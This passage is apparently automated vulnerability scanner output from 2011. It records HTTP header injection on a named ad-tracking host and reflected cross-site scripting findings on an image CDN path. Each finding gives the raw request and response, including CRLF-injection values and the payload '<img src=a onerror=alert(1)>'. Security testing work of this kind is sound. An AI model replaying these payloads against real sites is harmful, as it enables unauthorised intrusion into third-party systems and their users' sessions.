Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f925acac
221f811ccdb
,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload fa8dd%0d%0afea8607b62f was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=fa8dd%0d%0afea8607b62f&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:35 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:35 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100195|17778^1315097086^1315098886|11684^1315098364^1315100193|fa8dd
fea8607b62f
^1315098395^1315100195; path=/; expires=Sun, 04-Sep-11 01:36:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


5. Cross-site scripting (reflected)
There are 105 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43 was submitted in the REST URL parameter 9. This input was echoed as 2fd86<img src=a onerror=alert(1)>af4802e2c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:42 GMT
Connection: close

Unable to find /ProvideCommerce/P0026084b2fd86<img src=a onerror=alert(1)>af4802e2c43

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef was submitted in the REST URL parameter 9. This input was echoed as 49c07<img src=a onerror=alert(1)>86ab35ef3ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:15 GMT
Connection: close

Unable to find /ProvideCommerce/P0054242b49c07<img src=a onerror=alert(1)>86ab35ef3ef

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0 was submitted in the REST URL parameter 9. This input was echoed as 56b44<img src=a onerror=alert(1)>5949f4937c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:13 GMT
Connection: close

Unable to find /ProvideCommerce/P0057916b56b44<img src=a onerror=alert(1)>5949f4937c0

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 30b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4 was submitted in REST URL parameter 9 and was echoed as 30b2f<img src=a onerror=alert(1)>5d12361a7b4 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188130b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:13 GMT
Connection: close

Unable to find /ProvideCommerce/P007188130b2f<img src=a onerror=alert(1)>5d12361a7b4

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload b573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84 was submitted in REST URL parameter 9 and was echoed as b573e<img src=a onerror=alert(1)>554311b6c84 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727bb573e<img%20src%3da%20onerror%3dalert(1)>554311b6c84?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:02 GMT
Connection: close

Unable to find /ProvideCommerce/P0073727bb573e<img src=a onerror=alert(1)>554311b6c84

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077 was submitted in REST URL parameter 9 and was echoed as 1047c<img src=a onerror=alert(1)>2e316f78077 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b1047c<img%20src%3da%20onerror%3dalert(1)>2e316f78077?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:41 GMT
Connection: close

Unable to find /ProvideCommerce/P0090481b1047c<img src=a onerror=alert(1)>2e316f78077

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3 was submitted in REST URL parameter 9 and was echoed as 7c462<img src=a onerror=alert(1)>76984cbffb3 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b7c462<img%20src%3da%20onerror%3dalert(1)>76984cbffb3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:19 GMT
Connection: close

Unable to find /ProvideCommerce/P0105447b7c462<img src=a onerror=alert(1)>76984cbffb3

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload b1157<img%20src%3da%20onerror%3dalert(1)>920787cad49 was submitted in REST URL parameter 9 and was echoed as b1157<img src=a onerror=alert(1)>920787cad49 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684bb1157<img%20src%3da%20onerror%3dalert(1)>920787cad49?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:58 GMT
Connection: close

Unable to find /ProvideCommerce/P0105684bb1157<img src=a onerror=alert(1)>920787cad49

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315 was submitted in REST URL parameter 9 and was echoed as 966ec<img src=a onerror=alert(1)>cb6928d315 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b966ec<img%20src%3da%20onerror%3dalert(1)>cb6928d315?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:16 GMT
Connection: close

Unable to find /ProvideCommerce/P0106998b966ec<img src=a onerror=alert(1)>cb6928d315

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 8719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c was submitted in REST URL parameter 9 and was echoed as 8719d<img src=a onerror=alert(1)>48d0d519a3c in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W18719d<img%20src%3da%20onerror%3dalert(1)>48d0d519a3c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:05 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_00000001016X_35172_W18719d<img src=a onerror=alert(1)>48d0d519a3c

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0 was submitted in REST URL parameter 9 and was echoed as 5ad2c<img src=a onerror=alert(1)>a2783a548b0 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img%20src%3da%20onerror%3dalert(1)>a2783a548b0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:24 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_000000076432_66228_W1_SQ5ad2c<img src=a onerror=alert(1)>a2783a548b0

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ

Issue detail

The value of REST URL parameter 9 is reflected unencoded in the response body. The payload 90233<img%20src%3da%20onerror%3dalert(1)>4af1509f708 was submitted in REST URL parameter 9 and was echoed as 90233<img src=a onerror=alert(1)>4af1509f708 in the application's response.

The echoed string is a complete <img> element carrying an onerror handler, so it would execute arbitrary JavaScript in a browser that parses this response as HTML. The response below, however, is an HTTP 403 served with Content-Type: text/plain and without an X-Content-Type-Options header: a browser that honours the declared type renders the body as text and never runs the handler, and only legacy content sniffing of text/plain bodies would change that. What the transaction proves is that path input reaches the response body without HTML encoding; to confirm exploitable reflected XSS, the same reflection has to be found in a text/html response, which this request does not produce.

Request

